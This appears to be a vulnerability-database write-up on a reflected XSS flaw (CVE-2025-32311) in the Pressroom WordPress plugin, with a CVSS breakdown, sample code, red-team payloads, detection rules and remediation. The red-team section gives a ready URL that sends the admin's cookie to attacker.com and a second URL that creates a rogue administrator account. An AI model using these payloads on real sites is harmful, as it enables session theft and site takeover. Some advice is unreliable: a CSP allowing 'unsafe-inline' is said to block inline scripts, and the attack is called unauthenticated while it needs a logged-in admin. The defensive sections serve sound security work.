CVE-2025-32311
Executive Summary
CVE-2025-32311 is a reflected Cross-Site Scripting (XSS) vulnerability in the Pressroom plugin for WordPress, developed by QuanticaLabs. The flaw exists in versions up to and including 7.0, where user-supplied input is not properly neutralized during web page generation. An attacker can craft a malicious URL that, when visited by an authenticated WordPress administrator, executes arbitrary JavaScript in the context of the admin dashboard. This can lead to session hijacking, privilege escalation, or injection of malicious content.
Given that Pressroom is a WordPress plugin, this vulnerability directly impacts the WordPress ecosystem. The attack vector is network-based, requires low complexity, and only requires user interaction (clicking a link). The CVSS score of 7.1 reflects the potential for significant impact on confidentiality, integrity, and availability, albeit with some scope change due to the reflected nature.
This record — and 170,000+ others — are available via the ValtersIT API. One endpoint replaces five: NVD + GitHub CVE + CISA KEV + EPSS + Nuclei + Exploit-DB, unified.

Supply Chain & Package Security
Pressroom is distributed via the official WordPress plugin repository and third-party marketplaces. Since no patch is available, users must rely on manual mitigation or removal. The lack of a patch increases supply chain risk, as compromised sites can be used to distribute further malware or phishing campaigns.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
- Base Score: 7.1 (High)
- Attack Vector: Network (AV:N)
- Attack Complexity: Low (AC:L)
- Privileges Required: None (PR:N)
- User Interaction: Required (UI:R)
- Scope: Changed (S:C)
- Confidentiality Impact: Low (C:L)
- Integrity Impact: Low (I:L)
- Availability Impact: Low (A:L)
Threat Level: High. The vulnerability is easy to exploit and requires no authentication. Successful exploitation can lead to full compromise of the WordPress admin session.
Deep Dive & Mechanics
The vulnerability resides in the Pressroom plugin's handling of URL parameters. When a user accesses a crafted URL, the plugin reflects the malicious input without proper sanitization or output encoding. For example, a parameter like ?page=pressroom-settings&tab=<script>alert(1)</script> would be rendered directly in the admin page HTML.
The root cause is the use of $_GET or $_REQUEST values directly in HTML output without passing through WordPress's esc_html() or esc_attr() functions. This is a classic reflected XSS pattern.
Attack Flow:
- Attacker crafts a malicious URL containing JavaScript payload.
- Attacker sends the URL to an authenticated admin via email, social media, or other channels.
- Admin clicks the link while logged into WordPress.
- The browser executes the injected script in the context of the admin dashboard.
- The script can steal cookies, create new admin users, or inject backdoors.
Vulnerable vs. Patched Code
Since no patch is available, the vulnerable code pattern is shown below. A patched version would use proper escaping.
Vulnerable Code (Pressroom <= 7.0):
<?php
// Vulnerable: directly echoing user input
$tab = $_GET['tab'];
echo '<div class="tab-content">' . $tab . '</div>';
?>
Patched Code (Hypothetical):
<?php
// Patched: using WordPress escaping functions
$tab = isset($_GET['tab']) ? sanitize_text_field($_GET['tab']) : '';
echo '<div class="tab-content">' . esc_html($tab) . '</div>';
?>
Exploitation & Lab Setup
Red Team
Prerequisites:
- A WordPress site with Pressroom plugin version <= 7.0 installed.
- An authenticated admin user session.
Exploit Payload:
http://target.com/wp-admin/admin.php?page=pressroom-settings&tab=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Steps:
- Host a listener on attacker.com to capture cookies.
- Send the crafted URL to the admin.
- Once clicked, the admin's session cookie is exfiltrated.
- Use the cookie to impersonate the admin.
Advanced Payload (Create Admin User):
http://target.com/wp-admin/admin.php?page=pressroom-settings&tab=<script>var xhr=new XMLHttpRequest();xhr.open('POST','/wp-admin/user-new.php',true);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xhr.send('action=createuser&user_login=eviladmin&email=evil@example.com&pass1=EvilPass123&role=administrator');</script>
Blue Team
Detection:
- Monitor web server logs for requests to
/wp-admin/admin.php?page=pressroom-settingswith suspicioustabparameter values containing<script>,onerror, or other HTML event handlers. - Use WAF rules to block reflected XSS patterns in the
tabparameter.
Mitigation:
- Disable or remove the Pressroom plugin until a patch is available.
- Implement Content Security Policy (CSP) headers to block inline scripts.
- Use WordPress security plugins that add XSS filtering.
Indicators of Compromise (IOCs)
- URL Pattern:
/wp-admin/admin.php?page=pressroom-settings&tab=* - Log Entries: Requests containing
<script>,onload,onerror,javascript:in thetabparameter. - Network Traffic: Outbound connections to unknown domains from the WordPress admin dashboard.
- File Changes: Unexpected admin users or modified plugin files.

Remediation & Mitigation
Immediate Actions:
- Disable the Pressroom plugin until a patch is released.
- Implement a Web Application Firewall (WAF) rule to block requests containing XSS patterns in the
tabparameter. - Add Content Security Policy (CSP) headers:
default-src 'self'; script-src 'self' 'unsafe-inline'(note:unsafe-inlineweakens CSP but may be needed for compatibility; prefer nonce-based CSP).
Long-term:
- Monitor the vendor's website for a patched version.
- Consider replacing Pressroom with an alternative plugin that is actively maintained.
- Conduct a security audit of all WordPress plugins.
Workaround:
- Edit the plugin file (e.g.,
pressroom/admin/views/settings.php) and addesc_html()around the$tabvariable. This is a temporary fix and will be overwritten on plugin update.
